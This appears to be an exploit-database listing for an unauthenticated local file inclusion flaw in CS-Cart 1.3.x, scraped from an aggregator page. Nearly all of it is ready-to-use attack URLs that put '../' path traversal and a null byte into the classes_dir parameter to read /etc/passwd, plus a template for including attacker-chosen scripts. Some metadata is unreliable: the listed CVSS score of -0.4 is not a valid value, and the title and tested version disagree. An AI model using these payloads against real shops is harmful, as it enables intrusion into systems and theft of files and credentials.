Exploit for CS-Cart 1.3.3 Local File Inclusion

Name: Exploit for CS-Cart 1.3.3 Local File Inclusion
Rating: 5 (321 reviews)

2020-10-16 | CVSS -0.4

## https://sploitus.com/exploit?id=PACKETSTORM:159578
# Exploit Title: CS-Cart unauthenticated LFI  
# Date: 2020-09-22  
# Exploit Author: 0xmmnbassel  
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html  
# Tested at: ver. 1.3.4  
# Vulnerability Type: unauthenticated LFI  
  
  
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00  
example:   
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00  
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00